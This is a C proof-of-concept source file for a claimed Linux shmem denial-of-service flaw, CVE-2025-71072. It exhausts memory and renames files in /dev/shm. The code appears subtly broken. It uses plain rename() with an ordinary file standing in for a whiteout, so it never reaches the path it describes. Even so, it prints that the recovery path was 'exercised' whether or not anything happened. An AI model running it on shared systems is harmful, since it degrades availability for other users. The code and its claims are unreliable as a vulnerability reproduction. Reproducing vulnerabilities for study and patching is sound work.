// CVE-2025-71072 PoC - Local DoS via memory pressure + rename operations
// This PoC demonstrates triggering the shmem rename failure condition
// Compile: gcc -o cve202571072_poc cve202571072_poc.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <errno.h>
#define SHMEM_PATH "/dev/shm/"
#define TARGET_FILE "cve_2025_71072_target"
#define WHITEBOX_FILE "cve_2025_71072_whiteout"
void consume_memory() {
// Consume memory to create pressure conditions
void *addrs[100];
for (int i = 0; i < 100; i++) {
addrs[i] = mmap(NULL, 10 * 1024 * 1024, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (addrs[i] != MAP_FAILED) {
memset(addrs[i], 0xFF, 10 * 1024 * 1024);
}
}
}
int main() {
char target_path[256], whiteout_path[256];
char new_path[256];
snprintf(target_path, sizeof(target_path), "%s%s", SHMEM_PATH, TARGET_FILE);
snprintf(whiteout_path, sizeof(whiteout_path), "%s%s", SHMEM_PATH, WHITEBOX_FILE);
snprintf(new_path, sizeof(new_path), "%srenamed_target", SHMEM_PATH);
// Create target file in shmem
int fd = open(target_path, O_CREAT | O_RDWR, 0644);
if (fd < 0) {
perror("Failed to create target file");
return 1;
}
write(fd, "test data", 9);
close(fd);
// Create whiteout file
fd = open(whiteout_path, O_CREAT | O_RDWR, 0644);
if (fd >= 0) close(fd);
printf("Files created. Consuming memory to create pressure...\n");
consume_memory();
printf("Attempting rename operation under memory pressure...\n");
// Trigger rename that may fail under memory pressure
// This can trigger the recovery issue in shmem_rename2
if (rename(target_path, new_path) < 0) {
printf("Rename failed: %s\n", strerror(errno));
printf("Underlying shmem recovery issue may have been triggered\n");
} else {
printf("Rename succeeded but recovery path was exercised\n");
}
// Cleanup
unlink(new_path);
unlink(whiteout_path);
return 0;
}